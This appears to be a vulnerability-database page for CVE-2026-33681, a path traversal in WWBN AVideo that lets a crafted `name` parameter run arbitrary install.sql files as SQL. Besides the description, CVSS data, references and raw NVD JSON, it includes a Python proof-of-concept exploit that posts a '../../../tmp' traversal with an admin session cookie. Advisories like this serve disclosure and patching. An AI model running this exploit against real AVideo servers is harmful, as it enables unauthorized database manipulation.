CVE-2026-33681

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database. Commit 81b591c509835505cb9f298aa1162ac64c4152cb contains a patch.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: AVideo Platform Path Traversal to SQL Execution
# Description: PoC for CVE-2026-33681
# Note: Requires Admin credentials or valid session cookie

def exploit(target_url, session_cookie, traversal_path):
    """
    Attempts to execute an install.sql file from a traversed path.
    :param target_url: Base URL of the AVideo instance (e.g., http://localhost)
    :param session_cookie: Valid PHPSESSID for an admin user
    :param traversal_path: Path traversal sequence (e.g., '../../../tmp')
    """
    url = f"{target_url}/objects/pluginRunDatabaseScript.json.php"
    
    # The 'name' parameter is vulnerable to path traversal
    # The application appends '/install/install.sql' to the provided name
    payload = {
        "name": traversal_path
    }
    
    headers = {
        "Cookie": f"PHPSESSID={session_cookie}"
    }
    
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] Response: {response.text}")
            
            # Check for SQL execution success indicators (depends on app feedback)
            if "error" not in response.text.lower():
                print("[+] Potential SQL execution successful.")
            else:
                print("[-] Server returned an error.")
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://avideo-example.com"
    # Assume attacker uploaded a malicious install.sql to /tmp via another method
    # Traversal path points to /tmp so it reads /tmp/install/install.sql
    path = "../../../tmp"
    cookie = "valid_admin_session_id_here"
    
    exploit(target, cookie, path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33681
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33681
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33681/
[4] VulDB https://vuldb.com/cve/CVE-2026-33681
[5] https://github.com/WWBN/AVideo/commit/81b591c509835505cb9f298aa1162ac64c4152cb
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-3hwv-x8g3-9qpr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33681", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:41.540", "lastModified": "2026-03-25T18:03:12.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database. Commit 81b591c509835505cb9f298aa1162ac64c4152cb contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el endpoint 'objects/pluginRunDatabaseScript.json.php' acepta un parámetro 'name' vía POST y lo pasa a 'Plugin::getDatabaseFileName()' sin ninguna sanitización de salto de ruta. Esto permite a un administrador autenticado (o a un atacante vía CSRF) atravesar fuera del directorio del plugin y ejecutar el contenido de cualquier archivo 'install/install.sql' en el sistema de archivos como consultas SQL sin procesar contra la base de datos de la aplicación. El commit 81b591c509835505cb9f298aa1162ac64c4152cb contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/81b591c509835505cb9f298aa1162ac64c4152cb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3hwv-x8g3-9qpr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}